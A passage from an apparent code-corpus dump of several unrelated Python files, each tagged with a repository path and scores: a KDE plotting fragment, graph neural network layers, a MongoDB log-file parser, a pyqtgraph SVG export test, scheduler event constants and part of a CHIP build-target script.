plt.setp(line, color=c)
plt.setp(line, marker=m)
plt.setp(line, linestyle=l)
ytitle = ytitle or "Density"
if legend is True:
plt.legend(loc="best")
if hlines_y is not None:
hlines_y = tsutils.make_list(hlines_y)
hlines_xmin = tsutils.make_list(hlines_xmin)
hlines_xmax = tsutils.make_list(hlines_xmax)
hlines_colors = tsutils.make_list(hlines_colors)
hlines_linestyles = tsutils.make_list(hlines_linestyles)
nxlim = ax.get_xlim()
if hlines_xmin is None:
hlines_xmin = nxlim[0]
if hlines_xmax is None:
hlines_xmax = nxlim[1]
if vlines_x is not None:
vlines_x = tsutils.make_list(vlines_x)
vlines_ymin = tsutils.make_list(vlines_ymin)
vlines_ymax = tsutils.make_list(vlines_ymax)
vlines_colors = tsutils.make_list(vlines_colors)
vlines_linestyles = tsutils.make_list(vlines_linestyles)
nylim = ax.get_ylim()
if vlines_ymin is None:
vlines_ymin = nylim[0]
if vlines_ymax is None:
vlines_ymax = nylim[1]
if type in [
"time",
"xy",
"bar",
"bar_stacked",
"histogram",
"norm_xaxis",
"lognorm_xaxis",
"weibull_xaxis",
"norm_yaxis",
"lognorm_yaxis",
"weibull_yaxis",
]:
if hlines_y is not None:
if type in ["norm_yaxis", "lognorm_yaxis", "weibull_yaxis"]:
hlines_y = ppf(tsutils.make_list(hlines_y))
plt.hlines(
hlines_y,
hlines_xmin,
hlines_xmax,
colors=hlines_colors,
linestyles=hlines_linestyles,
)
if vlines_x is not None:
if type in ["norm_xaxis", "lognorm_xaxis", "weibull_xaxis"]:
vlines_x = ppf(tsutils.make_list(vlines_x))
plt.vlines(
vlines_x,
vlines_ymin,
vlines_ymax,
colors=vlines_colors,
linestyles=vlines_linestyles,
)
plt.xlabel(xtitle)
plt.ylabel(ytitle)
if invert_xaxis is True:
plt.gca().invert_xaxis()
if invert_yaxis is True:
plt.gca().invert_yaxis()
plt.grid(grid)
plt.title(title)
plt.tight_layout()
if ofilename is not None:
plt.savefig(ofilename)
return plt
kde.__doc__ = kde_cli.__doc__
| 2.09375 | 2 |
src/models/GNN.py | 3verlyn/DL-abstract-argumentation | 6 | 1292 | from collections import OrderedDict
import torch
import torch.nn as nn
from torch_geometric.data.batch import Batch
class GNN(nn.Module):
def __init__(self, mp_steps, **config):
super().__init__()
self.mp_steps = mp_steps
self.update_fns = self.assign_update_fns()
self.readout_fns = self.assign_readout_fns()
def assign_update_fns(self) -> OrderedDict:
raise NotImplementedError
def assign_readout_fns(self) -> dict:
raise NotImplementedError
def forward(self, batch: Batch, output_all_steps=True):
edge_index = batch.edge_index
sections = (
torch.bincount(batch.batch).tolist() if hasattr(batch, "batch") else None
)
hiddens = self.initialize(batch)
del batch
# update attributes with update and aggregation step
outputs = {element: [] for element in self.readout_fns.keys()}
for step in range(self.mp_steps):
hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens)
if not output_all_steps and (step + 1) != self.mp_steps:
continue
for element, readout_fn in self.readout_fns.items():
outputs[element].append(readout_fn(**hiddens))
return outputs
def initialize(self, batch):
hiddens = {}
# initialize attributes trough embeddings and intialize lstm states to None
for element in self.embeddings.keys():
embedding = self.embeddings[element](batch[f"{element}_input"])
hiddens.update(
{
f"{element}_input": embedding,
f"{element}_embedding": embedding.clone(),
f"{element}_lstm": None,
}
)
return hiddens
def step(self, edge_index, sections, **hiddens):
"""
Perform a message passing step by propagating information and updating each element
"""
for element, update_fn in self.update_fns.items():
hiddens[f"{element}_embedding"], hiddens[f"{element}_lstm"] = update_fn(
edge_index=edge_index, sections=sections, element=element, **hiddens
)
return hiddens
| 2.34375 | 2 |
configs/baselines/DACN/GNN/GCN_res_layer.py | vivek-r-2000/BoundaryNet | 17 | 1293 | <reponame>vivek-r-2000/BoundaryNet<gh_stars>10-100
import math
import torch
import torch.nn as nn
from torch.nn.modules.module import Module
from GNN.GCN_layer import GraphConvolution
class GraphResConvolution(Module):
"""
Simple GCN layer, similar to https://arxiv.org/abs/1609.02907
"""
def __init__(self, state_dim, name=''):
super(GraphResConvolution, self).__init__()
self.state_dim = state_dim
self.gcn_1 = GraphConvolution(state_dim, '%s_1' % name)
self.gcn_2 = GraphConvolution(state_dim, '%s_2' % name)
self.relu1 = nn.ReLU()
self.relu2 = nn.ReLU()
self.name = name
def forward(self, input, adj):
output_1 = self.gcn_1(input, adj)
output_1_relu = self.relu1(output_1)
output_2 = self.gcn_2(output_1_relu, adj)
output_2_res = output_2 + input
output = self.relu2(output_2_res)
return output
def __repr__(self):
return self.__class__.__name__ + ' (' + self.name + ')' | 2.8125 | 3 |
mtools/util/logfile.py | lukasvosyka/mtools | 0 | 1294 | <gh_stars>0
#!/usr/bin/env python3
from __future__ import print_function
import os
import re
import sys
from datetime import datetime
from math import ceil
from mtools.util.input_source import InputSource
from mtools.util.logevent import LogEvent
class LogFile(InputSource):
"""Log file wrapper class. Handles open file streams or stdin."""
def __init__(self, filehandle):
"""Provide logfile as open file stream or stdin."""
self.filehandle = filehandle
self.name = filehandle.name
self.from_stdin = filehandle.name == "<stdin>"
self._bounds_calculated = False
self._start = None
self._end = None
self._filesize = None
self._num_lines = None
self._restarts = None
self._binary = None
self._timezone = None
self._hostname = None
self._port = None
self._rs_state = None
self._repl_set = None
self._repl_set_members = None
self._repl_set_version = None
self._repl_set_protocol = None
self._storage_engine = None
self._datetime_format = None
self._year_rollover = None
self._shards = None
self._csrs = None
self._chunks_moved_from = None
self._chunks_moved_to = None
self._chunk_splits = None
# Track previous file position for loop detection in _find_curr_line()
self.prev_pos = None
self._has_level = None
# make sure bounds are calculated before starting to iterate,
# including potential year rollovers
self._calculate_bounds()
@property
def start(self):
"""
Lazy evaluation of start and end of logfile.
Returns None for stdin input currently.
"""
if not self._start:
self._calculate_bounds()
return self._start
@property
def end(self):
"""
Lazy evaluation of start and end of logfile.
Returns None for stdin input currently.
"""
if not self._end:
self._calculate_bounds()
return self._end
@property
def timezone(self):
"""Lazy evaluation of timezone of logfile."""
if not self._timezone:
self._calculate_bounds()
return self._timezone
@property
def filesize(self):
"""
Lazy evaluation of start and end of logfile.
Returns None for stdin input currently.
"""
if self.from_stdin:
return None
if not self._filesize:
self._calculate_bounds()
return self._filesize
@property
def datetime_format(self):
"""Lazy evaluation of the datetime format."""
if not self._datetime_format:
self._calculate_bounds()
return self._datetime_format
@property
def has_level(self):
"""Lazy evaluation of the whether the logfile has any level lines."""
if self._has_level is None:
self._iterate_lines()
return self._has_level
@property
def year_rollover(self):
"""Lazy evaluation of the datetime format."""
if self._year_rollover is None:
self._calculate_bounds()
return self._year_rollover
@property
def num_lines(self):
"""
Lazy evaluation of the number of lines.
Returns None for stdin input currently.
"""
if self.from_stdin:
return None
if not self._num_lines:
self._iterate_lines()
return self._num_lines
@property
def restarts(self):
"""Lazy evaluation of all restarts."""
if not self._num_lines:
self._iterate_lines()
return self._restarts
@property
def rs_state(self):
"""Lazy evaluation of all restarts."""
if not self._num_lines:
self._iterate_lines()
return self._rs_state
@property
def binary(self):
"""Lazy evaluation of the binary name."""
if not self._num_lines:
self._iterate_lines()
return self._binary
@property
def hostname(self):
"""Lazy evaluation of the binary name."""
if not self._num_lines:
self._iterate_lines()
return self._hostname
@property
def port(self):
"""Lazy evaluation of the binary name."""
if not self._num_lines:
self._iterate_lines()
return self._port
@property
def versions(self):
"""Return all version changes."""
versions = []
for v, _ in self.restarts:
if len(versions) == 0 or v != versions[-1]:
versions.append(v)
return versions
@property
def repl_set(self):
"""Return the replSet (if available)."""
if not self._num_lines:
self._iterate_lines()
return self._repl_set
@property
def repl_set_members(self):
"""Return the replSet (if available)."""
if not self._num_lines:
self._iterate_lines()
return self._repl_set_members
@property
def repl_set_version(self):
"""Return the replSet (if available)."""
if not self._num_lines:
self._iterate_lines()
return self._repl_set_version
@property
def repl_set_protocol(self):
"""Return the replSet protocolVersion (if available)."""
if not self._num_lines:
self._iterate_lines()
return self._repl_set_protocol
@property
def storage_engine(self):
"""Return storage engine if available."""
if not self._num_lines:
self._iterate_lines()
return self._storage_engine
@property
def shards(self):
"""Lazily return the shards (if available)"""
if not self._shards:
self._find_sharding_info()
return self._shards
@property
def csrs(self):
"""Lazily return the CSRS (if available)"""
if not self._csrs:
self._find_sharding_info()
return self._csrs
@property
def chunks_moved_to(self):
"""Lazily return the chunks moved to this shard (if available)"""
if not self._chunks_moved_to:
self._find_sharding_info()
return self._chunks_moved_to
@property
def chunks_moved_from(self):
"""Lazily return the chunks moved from this shard (if available)"""
if not self._chunks_moved_from:
self._find_sharding_info()
return self._chunks_moved_from
@property
def chunk_splits(self):
"""Lazily return the chunks split in this shard (if available)"""
if not self._chunk_splits:
self._find_sharding_info()
return self._chunk_splits
def next(self):
"""Get next line, adjust for year rollover and hint datetime format."""
# use readline here because next() iterator uses internal readahead
# buffer so seek position is wrong
line = self.filehandle.readline()
if isinstance(line, bytes):
line = line.decode('utf-8', 'replace')
if line == '':
raise StopIteration
line = line.rstrip('\n')
le = LogEvent(line)
# hint format and nextpos from previous line
if self._datetime_format and self._datetime_nextpos is not None:
ret = le.set_datetime_hint(self._datetime_format,
self._datetime_nextpos,
self.year_rollover)
if not ret:
# logevent indicates timestamp format has changed,
# invalidate hint info
self._datetime_format = None
self._datetime_nextpos = None
elif le.datetime:
# gather new hint info from another logevent
self._datetime_format = le.datetime_format
self._datetime_nextpos = le._datetime_nextpos
return le
def __iter__(self):
"""
Iterate over LogFile object.
Return a LogEvent object for each line (generator).
"""
le = None
while True:
try:
le = self.next()
except StopIteration as e:
# end of log file, get end date
if not self.end and self.from_stdin:
if le and le.datetime:
self._end = le.datetime
# future iterations start from the beginning
if not self.from_stdin:
self.filehandle.seek(0)
# return (instead of raising StopIteration exception) per PEP 479
return
# get start date for stdin input
if not self.start and self.from_stdin:
if le and le.datetime:
self._start = le.datetime
try:
yield le
except StopIteration:
return
states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2',
'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN'])
def __len__(self):
"""Return the number of lines in a log file."""
return self.num_lines
def _iterate_lines(self):
"""Count number of lines (can be expensive)."""
self._num_lines = 0
self._restarts = []
self._rs_state = []
ln = 0
for ln, line in enumerate(self.filehandle):
if isinstance(line, bytes):
line = line.decode("utf-8", "replace")
if (self._has_level is None and
line[28:31].strip() in LogEvent.log_levels and
line[31:39].strip() in LogEvent.log_components):
self._has_level = True
# find version string (fast check to eliminate most lines)
if "version" in line[:100]:
logevent = LogEvent(line)
restart = self._check_for_restart(logevent)
if restart:
self._restarts.append((restart, logevent))
if "starting :" in line or "starting:" in line:
# look for hostname, port
match = re.search('port=(?P<port>\d+).*host=(?P<host>\S+)',
line)
if match:
self._hostname = match.group('host')
self._port = match.group('port')
""" For 3.0 the "[initandlisten] options:" long entry contained the
"engine" field if WiredTiger was the storage engine. There were
only two engines, MMAPv1 and WiredTiger
"""
if "[initandlisten] options:" in line:
match = re.search('replSet: "(?P<replSet>\S+)"', line)
if match:
self._repl_set = match.group('replSet')
match = re.search('engine: "(?P<engine>\S+)"', line)
if match:
self._storage_engine = match.group('engine')
else:
self._storage_engine = 'mmapv1'
""" For 3.2 the "[initandlisten] options:" no longer contains the
"engine" field So now we have to look for the "[initandlisten]
wiredtiger_open config:" which was present in 3.0, but would
now tell us definitively that wiredTiger is being used
"""
if "[initandlisten] wiredtiger_open config:" in line:
self._storage_engine = 'wiredTiger'
if "command admin.$cmd command: { replSetInitiate:" in line:
match = re.search('{ _id: "(?P<replSet>\S+)", '
'members: (?P<replSetMembers>[^]]+ ])', line)
if match:
self._repl_set = match.group('replSet')
self._repl_set_members = match.group('replSetMembers')
# Replica set config logging in MongoDB 3.0+
new_config = ("New replica set config in use: ")
if new_config in line:
match = re.search('{ _id: "(?P<replSet>\S+)", '
'version: (?P<replSetVersion>\d+), ', line)
if match:
self._repl_set = match.group('replSet')
self._repl_set_version = match.group('replSetVersion')
match = re.search(', protocolVersion: (?P<replSetProtocol>\d+), ', line)
if match:
self._repl_set_protocol = match.group('replSetProtocol')
match = re.search('members: (?P<replSetMembers>[^]]+ ])', line)
if match:
self._repl_set_members = match.group('replSetMembers')
# if ("is now in state" in line and
# next(state for state in states if line.endswith(state))):
if "is now in state" in line:
tokens = line.split()
# 2.6
if tokens[1].endswith(']'):
pos = 4
else:
pos = 5
host = tokens[pos]
rs_state = tokens[-1]
state = (host, rs_state, LogEvent(line))
self._rs_state.append(state)
continue
if "[rsMgr] replSet" in line:
tokens = line.split()
if self._hostname:
host = self._hostname + ':' + self._port
else:
host = os.path.basename(self.name)
host += ' (self)'
if tokens[-1] in self.states:
rs_state = tokens[-1]
else:
# 2.6
if tokens[1].endswith(']'):
pos = 2
else:
pos = 6
rs_state = ' '.join(tokens[pos:])
state = (host, rs_state, LogEvent(line))
self._rs_state.append(state)
continue
self._num_lines = ln + 1
# reset logfile
self.filehandle.seek(0)
def _check_for_restart(self, logevent):
if (logevent.thread == 'initandlisten' and
"db version v" in logevent.line_str):
self._binary = 'mongod'
elif logevent.thread == 'mongosMain' and ('MongoS' in logevent.line_str or
'mongos' in logevent.line_str):
self._binary = 'mongos'
else:
return False
version = re.search(r'(\d\.\d\.\d+)', logevent.line_str)
if version:
version = version.group(1)
return version
else:
return False
def _calculate_bounds(self):
"""Calculate beginning and end of logfile."""
if self._bounds_calculated:
# Assume no need to recalc bounds for lifetime of a Logfile object
return
if self.from_stdin:
return False
# we should be able to find a valid log line within max_start_lines
max_start_lines = 10
lines_checked = 0
# get start datetime
for line in self.filehandle:
logevent = LogEvent(line)
lines_checked += 1
if logevent.datetime:
self._start = logevent.datetime
self._timezone = logevent.datetime.tzinfo
self._datetime_format = logevent.datetime_format
self._datetime_nextpos = logevent._datetime_nextpos
break
if lines_checked > max_start_lines:
break
# sanity check before attempting to find end date
if (self._start is None):
raise SystemExit("Error: <%s> does not appear to be a supported "
"MongoDB log file format" % self.filehandle.name)
# get end datetime (lines are at most 10k,
# go back 30k at most to make sure we catch one)
self.filehandle.seek(0, 2)
self._filesize = self.filehandle.tell()
self.filehandle.seek(-min(self._filesize, 30000), 2)
for line in reversed(self.filehandle.readlines()):
logevent = LogEvent(line)
if logevent.datetime:
self._end = logevent.datetime
break
# if there was a roll-over, subtract 1 year from start time
if self._end < self._start:
self._start = self._start.replace(year=self._start.year - 1)
self._year_rollover = self._end
else:
self._year_rollover = False
# reset logfile
self.filehandle.seek(0)
self._bounds_calculated = True
return True
def _find_curr_line(self, prev=False):
"""
Internal helper function.
Find the current (or previous if prev=True) line in a log file based on
the current seek position.
"""
curr_pos = self.filehandle.tell()
# jump back 15k characters (at most) and find last newline char
jump_back = min(self.filehandle.tell(), 15000)
self.filehandle.seek(-jump_back, 1)
buff = self.filehandle.read(jump_back)
self.filehandle.seek(curr_pos, 0)
if prev and self.prev_pos is not None and self.prev_pos == curr_pos:
# Number of characters to show before/after the log offset
error_context = 300
self.filehandle.seek(-error_context, 1)
buff = self.filehandle.read(curr_pos)
hr = "-" * 60
print("Fatal log parsing loop detected trying to find previous "
"log line near offset %s in %s:\n\n%s\n%s\n"
"<--- (current log parsing offset) \n%s\n%s\n"
% (curr_pos, self.name, hr, buff[:error_context],
buff[error_context:error_context + 1], hr),
file=sys.stderr)
raise SystemExit("Cannot parse %s with requested options"
% self.filehandle.name)
else:
self.prev_pos = curr_pos
if isinstance(buff, bytes):
buff = buff.decode("utf-8", "replace")
newline_pos = buff.rfind('\n')
if prev:
newline_pos = buff[:newline_pos].rfind('\n')
# move back to last newline char
if newline_pos == -1:
self.filehandle.seek(0)
return self.next()
self.filehandle.seek(newline_pos - jump_back + 1, 1)
# roll forward until we found a line with a datetime
try:
logevent = self.next()
while not logevent.datetime:
logevent = self.next()
return logevent
except StopIteration:
# reached end of file
return None
def _find_sharding_info(self):
"""
Iterate over file and find any sharding related information
"""
self._shards = []
self._chunks_moved_from = []
self._chunks_moved_to = []
self._chunk_splits = []
prev_line = ""
for line in self.filehandle:
if isinstance(line, bytes):
line = line.decode("utf-8", "replace")
if self.binary == "mongos":
if "Starting new replica set monitor for" in line:
if "[mongosMain]" in line:
match = re.search("for (?P<csrsName>\w+)/"
"(?P<replSetMembers>\S+)", line)
if match:
csrs_info = (match.group('csrsName'),
match.group('replSetMembers'))
self._csrs = csrs_info
else:
match = re.search("for (?P<shardName>\w+)/"
"(?P<replSetMembers>\S+)", line)
if match:
shard_info = (match.group('shardName'),
match.group('replSetMembers'))
self._shards.append(shard_info)
elif self.binary == "mongod":
logevent = LogEvent(line)
if "New replica set config in use" in line:
if "configsvr: true" in line:
match = re.search(' _id: "(?P<replSet>\S+)".*'
'members: (?P<replSetMembers>[^]]+ ])', line)
if match:
self._csrs = (
match.group('replSet'),
match.group('replSetMembers')
)
if "Starting new replica set monitor for" in line:
match = re.search("for (?P<replSet>\w+)/"
"(?P<replSetMembers>\S+)", line)
if match:
if self._csrs and match.group('replSet') != self._csrs[0]:
self._shards.append((
match.group('replSet'),
match.group('replSetMembers')
))
elif not self._csrs:
self._csrs = (
match.group('replSet'),
match.group('replSetMembers')
)
if "moveChunk.from" in line:
logevent = LogEvent(line)
match = re.search('ns: "(?P<namespace>\S+)".*'
'details: { (?P<range>.*\}).*'
'to: "(?P<movedTo>\S+)".*note: "(?P<note>\S+)"', line)
if match:
time = logevent.datetime
chunk_range = match.group('range')
namespace = match.group('namespace')
moved_to = match.group('movedTo')
note = match.group('note')
if note == "success":
errmsg = None
steps = re.findall('(?P<steps>step \d of \d): (?P<stepTimes>\d+)', line)
else:
match = re.search(':: caused by :: (?P<errmsg>\S+):', prev_line)
steps = None
if match:
errmsg = match.group('errmsg')
else:
errmsg = "Unknown"
chunk_migration = (time, chunk_range, moved_to, namespace, steps, note, errmsg)
self._chunks_moved_from.append(chunk_migration)
if "moveChunk.to" in line:
logevent = LogEvent(line)
match = re.search('ns: "(?P<namespace>\S+)".*'
'details: { (?P<range>.*\}).*.*note: "(?P<note>\S+)"', line)
if match:
time = logevent.datetime
chunk_range = match.group('range')
namespace = match.group('namespace')
# TODO: alter this to find moved from shard name when SERVER-45770 TICKET is added
moved_from = "Unknown"
note = match.group('note')
if note == "success":
errmsg = None
steps = re.findall('(?P<steps>step \d of \d): (?P<stepTimes>\d+)', line)
else:
steps = None
match = re.search('errmsg: "(?P<errmsg>.*)"', line)
if match:
errmsg = match.group('errmsg')
chunk_migration = (time, chunk_range, moved_from, namespace, steps, note, errmsg)
self._chunks_moved_to.append(chunk_migration)
if "Finding the split vector for" in line:
logevent = LogEvent(line)
match = re.search('for (?P<namespace>\S+).*'
'numSplits: (?P<numSplits>\d+)', line)
if match:
time = logevent.datetime
split_range = None
namespace = match.group("namespace")
numSplits = match.group('numSplits')
success = None
time_taken = 0
error = None
self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))
elif "splitVector" in line:
logevent = LogEvent(line)
match = re.search('splitVector: "(?P<namespace>\S+)".*,'
' (?P<range>min:.*), max.*op_msg (?P<time_taken>\d+)', line)
if match:
time = logevent.datetime
split_range = match.group("range")
namespace = match.group("namespace")
time_taken = match.group("time_taken")
numSplits = 0
success = True
error = None
self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))
elif "Unable to auto-split chunk" in line:
logevent = LogEvent(line)
match = re.search("chunk \[(?P<range>.*)\) "
'in namespace (?P<namespace>\S+)'
' :: caused by :: (?P<error>\S+): ', line)
if match:
time = logevent.datetime
split_range = match.group("range")
namespace = match.group("namespace")
numSplits = 0
success = False
time_taken = 0
error = match.group("error")
self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))
elif "jumbo" in line:
logevent = LogEvent(line)
match = re.search('migration (?P<namespace>\S+): \[(?P<range>.*)\)', prev_line)
if match:
time = logevent.datetime
split_range = match.group("range")
namespace = match.group("namespace")
numSplits = 0
success = False
time_taken = 0
error = "Jumbo"
self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))
prev_line = line
# reset logfile
self.filehandle.seek(0)
def fast_forward(self, start_dt):
"""
Fast-forward file to given start_dt datetime obj using binary search.
Only fast for files. Streams need to be forwarded manually, and it will
miss the first line that would otherwise match (as it consumes the log
line).
"""
if self.from_stdin:
# skip lines until start_dt is reached
return
else:
# fast bisection path
max_mark = self.filesize
step_size = max_mark
# check if start_dt is already smaller than first datetime
self.filehandle.seek(0)
le = self.next()
if le.datetime and le.datetime >= start_dt:
self.filehandle.seek(0)
return
le = None
self.filehandle.seek(0)
# search for lower bound
while abs(step_size) > 100:
step_size = ceil(step_size / 2.)
self.filehandle.seek(step_size, 1)
le = self._find_curr_line()
if not le:
break
if le.datetime >= start_dt:
step_size = -abs(step_size)
else:
step_size = abs(step_size)
if not le:
return
# now walk backwards until we found a truly smaller line
while self.filehandle.tell() >= 2 and (le.datetime is None or
le.datetime >= start_dt):
self.filehandle.seek(-2, 1)
le = self._find_curr_line(prev=True)
| 2.140625 | 2 |
tests/svg.py | Tillsten/pyqtgraph | 0 | 1295 | """
SVG export test
"""
import test
import pyqtgraph as pg
app = pg.mkQApp()
class SVGTest(test.TestCase):
#def test_plotscene(self):
#pg.setConfigOption('foreground', (0,0,0))
#w = pg.GraphicsWindow()
#w.show()
#p1 = w.addPlot()
#p2 = w.addPlot()
#p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'})
#p1.setXRange(0,5)
#p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3})
#app.processEvents()
#app.processEvents()
#ex = pg.exporters.SVGExporter.SVGExporter(w.scene())
#ex.export(fileName='test.svg')
def test_simple(self):
scene = pg.QtGui.QGraphicsScene()
#rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100)
#scene.addItem(rect)
#rect.setPos(20,20)
#rect.translate(50, 50)
#rect.rotate(30)
#rect.scale(0.5, 0.5)
#rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100)
#rect1.setParentItem(rect)
#rect1.setFlag(rect1.ItemIgnoresTransformations)
#rect1.setPos(20, 20)
#rect1.scale(2,2)
#el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100)
#el1.setParentItem(rect1)
##grp = pg.ItemGroup()
#grp.setParentItem(rect)
#grp.translate(200,0)
##grp.rotate(30)
#rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25)
#rect2.setFlag(rect2.ItemClipsChildrenToShape)
#rect2.setParentItem(grp)
#rect2.setPos(0,25)
#rect2.rotate(30)
#el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50)
#el.translate(10,-5)
#el.scale(0.5,2)
#el.setParentItem(rect2)
grp2 = pg.ItemGroup()
scene.addItem(grp2)
grp2.scale(100,100)
rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2)
rect3.setPen(pg.mkPen(width=1, cosmetic=False))
grp2.addItem(rect3)
ex = pg.exporters.SVGExporter.SVGExporter(scene)
ex.export(fileName='test.svg')
if __name__ == '__main__':
test.unittest.main() | 2.5625 | 3 |
src/api/models/enums/apschedulerevents.py | jedicontributors/pythondataintegrator | 14 | 1296 | <gh_stars>10-100
EVENT_SCHEDULER_STARTED = EVENT_SCHEDULER_START = 2 ** 0
EVENT_SCHEDULER_SHUTDOWN = 2 ** 1
EVENT_SCHEDULER_PAUSED = 2 ** 2
EVENT_SCHEDULER_RESUMED = 2 ** 3
EVENT_EXECUTOR_ADDED = 2 ** 4
EVENT_EXECUTOR_REMOVED = 2 ** 5
EVENT_JOBSTORE_ADDED = 2 ** 6
EVENT_JOBSTORE_REMOVED = 2 ** 7
EVENT_ALL_JOBS_REMOVED = 2 ** 8
EVENT_JOB_ADDED = 2 ** 9
EVENT_JOB_REMOVED = 2 ** 10
EVENT_JOB_MODIFIED = 2 ** 11
EVENT_JOB_EXECUTED = 2 ** 12
EVENT_JOB_ERROR = 2 ** 13
EVENT_JOB_MISSED = 2 ** 14
EVENT_JOB_SUBMITTED = 2 ** 15
EVENT_JOB_MAX_INSTANCES = 2 ** 16
EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED |
EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED |
EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED |
EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED |
EVENT_JOB_ERROR | EVENT_JOB_MISSED | EVENT_JOB_SUBMITTED | EVENT_JOB_MAX_INSTANCES) | 1.164063 | 1 |
scripts/build/build/targets.py | mrninhvn/matter | 2 | 1297 | <filename>scripts/build/build/targets.py
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from itertools import combinations
from typing import List
from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder
from builders.android import AndroidApp, AndroidBoard, AndroidBuilder
from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder
from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder
from builders.efr32 import Efr32App, Efr32Board, Efr32Builder
from builders.esp32 import Esp32App, Esp32Board, Esp32Builder
from builders.host import HostApp, HostBoard, HostBuilder
from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder
from builders.k32w import K32WApp, K32WBuilder
from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile
from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder
from builders.qpg import QpgApp, QpgBoard, QpgBuilder
from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder
from builders.tizen import TizenApp, TizenBoard, TizenBuilder
from builders.bl602 import Bl602App, Bl602Board, Bl602Builder
from builders.imx import IMXApp, IMXBuilder
class Target:
"""Represents a build target:
Has a name identifier plus parameters on how to build it (what
builder class to use and what arguments are required to produce
the specified build)
"""
def __init__(self, name, builder_class, **kwargs):
self.name = name
self.builder_class = builder_class
self.glob_blacklist_reason = None
self.create_kw_args = kwargs
def Clone(self):
"""Creates a clone of self."""
clone = Target(self.name, self.builder_class,
**self.create_kw_args.copy())
clone.glob_blacklist_reason = self.glob_blacklist_reason
return clone
def Extend(self, suffix, **kargs):
"""Creates a clone of the current object extending its build parameters.
Arguments:
suffix: appended with a "-" as separator to the clone name
**kargs: arguments needed to produce the new build variant
"""
clone = self.Clone()
clone.name += "-" + suffix
clone.create_kw_args.update(kargs)
return clone
def Create(self, runner, repository_path: str, output_prefix: str,
enable_flashbundle: bool):
builder = self.builder_class(
repository_path, runner=runner, **self.create_kw_args)
builder.target = self
builder.identifier = self.name
builder.output_dir = os.path.join(output_prefix, self.name)
builder.enable_flashbundle(enable_flashbundle)
return builder
def GlobBlacklist(self, reason):
clone = self.Clone()
if clone.glob_blacklist_reason:
clone.glob_blacklist_reason += ", "
clone.glob_blacklist_reason += reason
else:
clone.glob_blacklist_reason = reason
return clone
@property
def IsGlobBlacklisted(self):
return self.glob_blacklist_reason is not None
@property
def GlobBlacklistReason(self):
return self.glob_blacklist_reason
class AcceptAnyName:
def Accept(self, name: str):
return True
class AcceptNameWithSubstrings:
def __init__(self, substr: List[str]):
self.substr = substr
def Accept(self, name: str):
for s in self.substr:
if s in name:
return True
return False
class BuildVariant:
def __init__(self, name: str, validator=AcceptAnyName(),
conflicts: List[str] = [], requires: List[str] = [],
**buildargs):
self.name = name
self.validator = validator
self.conflicts = conflicts
self.buildargs = buildargs
self.requires = requires
def HasConflicts(items: List[BuildVariant]) -> bool:
for a, b in combinations(items, 2):
if (a.name in b.conflicts) or (b.name in a.conflicts):
return True
return False
def AllRequirementsMet(items: List[BuildVariant]) -> bool:
"""
Check that item.requires is satisfied for all items in the given list
"""
available = set([item.name for item in items])
for item in items:
for requirement in item.requires:
if requirement not in available:
return False
return True
class VariantBuilder:
"""Handles creating multiple build variants based on a starting target.
"""
def __init__(self, targets: List[Target] = []):
# note the clone in case the default arg is used
self.targets = targets[:]
self.variants = []
self.glob_whitelist = []
def WhitelistVariantNameForGlob(self, name):
"""
Whitelist the specified variant to be allowed for globbing.
By default we do not want a 'build all' to select all variants, so
variants are generally glob-blacklisted.
"""
self.glob_whitelist.append(name)
def AppendVariant(self, **args):
"""
Add another variant to accepted variants. Arguments are construction
variants to BuildVariant.
Example usage:
builder.AppendVariant(name="ipv6only", enable_ipv4=False)
"""
self.variants.append(BuildVariant(**args))
def AllVariants(self):
"""
Yields a list of acceptable variants for the given targets.
Handles conflict resolution between build variants and globbing
whitelist targets.
"""
for target in self.targets:
yield target
# skip variants that do not work for this target
ok_variants = [
v for v in self.variants if v.validator.Accept(target.name)]
# Build every possible variant
for variant_count in range(1, len(ok_variants) + 1):
for subgroup in combinations(ok_variants, variant_count):
if HasConflicts(subgroup):
continue
if not AllRequirementsMet(subgroup):
continue
# Target ready to be created - no conflicts
variant_target = target.Clone()
for option in subgroup:
variant_target = variant_target.Extend(
option.name, **option.buildargs)
# Only a few are whitelisted for globs
name = '-'.join([o.name for o in subgroup])
if name not in self.glob_whitelist:
if not variant_target.IsGlobBlacklisted:
variant_target = variant_target.GlobBlacklist(
'Reduce default build variants')
yield variant_target
def HostTargets():
target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)
